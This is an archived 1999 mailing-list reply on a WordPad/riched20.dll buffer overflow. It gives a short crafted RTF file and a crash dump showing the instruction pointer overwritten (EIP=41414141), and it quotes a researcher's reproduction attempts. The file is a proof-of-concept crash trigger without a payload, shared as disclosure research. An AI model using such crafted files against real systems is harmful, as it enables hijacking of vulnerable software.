Vulnerability Development mailing list archives

Re: WordPad/riched20.dll buffer overflow

From: gas-mail () INAME COM (Gas)
Date: Mon, 22 Nov 1999 16:37:36 -0300


I could reproduce EIP=41414141 with this file:

------------test.rtf-------------------
{\rtf1\AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAbcdeansi\ansicpg1252\deff0\deflang11274{\fonttbl {\f0\fnil\fcharset0 
Courier New;}}
\uc1\pard\ulnone\f0\fs20\par
}

------------end test.rtf---------------

And that's what i got:

----------------------------------------------------
WORDPAD provocó un error de página no válida en el
módulo <desconocido> de 0000:41414141.
Registros:
EAX=00000102 CS=0177 EIP=41414141 EFLGS=00010206
EBX=0056e36c SS=017f ESP=0056e32c EBP=00002c0a
ECX=0056e36c DS=017f ESI=0056e36c FS=419f
EDX=fffffff3 ES=017f EDI=0056e420 GS=367e
Bytes en CS:EIP:

Volcado de pila:
,08x ,08x ,08x ,08x ,08x ,08x ,08x ,08x ,08x ,08x ,08x ,08x ,08x ,08x ,08x ,08x
----------------------------------------------------

-- Gas
gas-mail () iname com

----- Original Message -----

From: Gerardo Richarte <core.lists.bugtraq () CORE-SDI COM>
To: BUGTRAQ () SECURITYFOCUS COM <BUGTRAQ () SECURITYFOCUS COM>
Sent: Jueves, 18 de Noviembre de 1999, 06:45 p.m.
Subject: WordPad/riched20.dll buffer overflow

        I've been trying to determine if it's exploitable, and couldn't
reproduce what you described. I want to know if there is some other
information I need to know... here is what I tried:

        an rtf file with

        {\rtf\AAAAAAAAA...} a lot of As (tryed 32,49,1000,2000,...
5000...
20000)

        nothing happened until 5000, where I got a crash but not with
EIP==
0x41414141 but with ESI==0x41414141 on a 'push [esi]'. ESI was copyed
previously from the stack, but on the stack there where only 4 As here,
8 As there, a so...
        then on 10000 As I got a different crash, with EDI==0x41414141,
but
never got EIP==0x41414141.

        Anyway, it MAY be exploitable, but doesn't look simple...

        Then I tryed a differen aproach I got
http://www.securityfocus.com, I used a real rtf file and appended
the same amount (32,49,...) of As after the first '\', but got exactly
the same results...

        could anybody reproduce this bug?

        richie

--
A390 1BBA 2C58 D679 5A71 - 86F9 404F 4B53 3944 C2D0
Research and Developemen - CoreLabs - Core SDI (Information Security)
http://www.core-sdi.com

--- For a personal reply use gera () core-sdi com


<!-- attachment="test.rtf" -->
<HR>
<UL>
<LI>application/msword attachment: test.rtf
</UL>

Current thread:

Re: WordPad/riched20.dll buffer overflow Michal Zalewski (Jul 17)
- Re: WordPad/riched20.dll buffer overflow Ussr Labs (Nov 26)
- <Possible follow-ups>
- Re: WordPad/riched20.dll buffer overflow Gas (Nov 22)